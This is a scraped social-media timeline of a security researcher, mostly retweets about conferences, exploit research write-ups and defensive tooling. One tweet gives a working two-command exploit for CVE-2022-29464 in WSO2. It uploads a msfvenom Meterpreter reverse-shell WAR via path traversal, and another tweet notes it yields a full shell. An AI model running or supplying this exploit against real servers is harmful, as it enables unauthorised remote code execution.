Network Intrusion Specialist

Joined October 2008
30 Mar 2023
So ends an era of the New Zealand scene that lasted well over a decade. Shout outs to all of the people who worked to contribute to this epic period of history. Congrats of course to those founders and owners that made it through to this point. Waiting now for the next wave.
antic0de retweeted
22 Sep 2022
The first 15 minutes of this week's @riskybusiness is why we build @ThinkstCanary (and why it works). - Attackers know there’s value in arb file shares; - Attackers know there are creds in random text files. Canaries && Canarytokens let defenders know when they are being touched
antic0de retweeted
13 May 2022
Can you bypass authentication by exploiting a vulnerability? 10$ for first solver! 💢🔥 octagon.net/chal/3.php
12 May 2022
RT @CyberCX: Congrats to our team members selected to join Team Oceania at the inaugural International #Cybersecurity Challenge CyberCX is…
antic0de retweeted
From a VR student today on our ROP chain lessons. I'm dying 😂: "This week's been like"
antic0de retweeted
22 Apr 2022
CVE-2022-29464 PoC for this in two commands... 1. msfvenom -p java/meterpreter/reverse_tcp -f war lhost=192.168.0.6 | curl -kv https://192.168.0.6:9443/fileupload/toolsAny -F ../../../../repository/deployment/server/webapps/x.war=@- 2. curl -kv https://192.168.0.6:9443/x :/
22 Apr 2022
On WSO2 CVE-2022-29464... you'll definitely want to check for deployed WAR files in addition to JSP. Confirmed a full Java Meterpreter shell for this.
antic0de retweeted
21 Apr 2022
My offensivecon 2022 keynote “rules to hack by” is now available on video at the link below
The great @mdowd keynote for offensivecon hit YouTube finally youtu.be/7Ysy6iA2sqA
antic0de retweeted
If you are using JWT Java EC, you should probably grep your logs for MAYCAQACAQA
antic0de retweeted
21 Apr 2022
I have been playing with KernelCallbackTable process injection lately and here's something I wanted to share. #redteam #maldev #infosec captmeelo.com/redteam/maldev…
antic0de retweeted
13 Apr 2022
Launch Update: Kawaiicon 2 are continuing to target July 1-2 2022 for launch. ✨Wave 1 of ticket sales to open midday Friday.✨ This is not a drill! What will Kawaiicon 2 look like this year? SO GLAD YOU ASKED.
antic0de retweeted
11 Mar 2022
A few people commented that it was annoying having to login to SlideShare to d/l, so I've made them available on github here: github.com/mdowd79/presentat…
9 Mar 2022
I have uploaded slide decks for 4 keynotes that I have done in the last few years, including the offensivecon 2022 keynote ("Rules to Hack By"). They are all here: slideshare.net/search/slides…
antic0de retweeted
10 Mar 2022
12 ROP chains later - from CVE-2019-0567 crash POC to code execution. ASLR, DEP, & CFG bypass ACG bypass using (since-patched) CVE-2017-8637 to abuse the way Chakra-based Edge handled (pun intended) supplying a handle from the out-of-process JIT server to a content process.
antic0de retweeted
8 Mar 2022
Thrilled to share my new blog post: Put an io_uring on it: Exploiting the Linux kernel. Follow me while I learn a new kernel subsystem its attack surface, find an 0day, build an exploit, come up with some new tricks. I go deep and demystify the process graplsecurity.com/post/iou-r…

antic0de retweeted
1 Apr 2020
Guys & girls! Exactly a year ago I promised over 15 bugs in win32k. You're welcome to read and find out about my biggest research so far: #win32k #SmashTheRef bug class - github.com/gdabah/win32k-bug… Check out the paper and the POCs, there is some crazy stuff going on. Promise!

antic0de retweeted
22 Feb 2022
We are pleased to announce tmp.0ut Volume 2 tmpout.sh/2/
antic0de retweeted
Ever wanted to debug your microcontroller over USB-C? (I'm talking JTAG/SWD, not just USB!) If you already have a USB-C connector, there's no need to have an additional connector to program (or tag-connect pads, which are super nice) Here's one way to do it: 🧵
antic0de retweeted
10 Feb 2022
The show will go on! Droppy has secured a new lair for #CrikeyCon at the RNA Showgrounds on 3rd September! Check crikeycon.com for updates as we have them!

antic0de retweeted
I just posted a write-up on how I leaked uninitialized memory (e.g., other users' HTTP requests/responses) from Fastly using a bug in the H2O webserver. Also, there you can learn a fraction of how HTTP/3 QUIC works) medium.com/@emil.lerner/leak…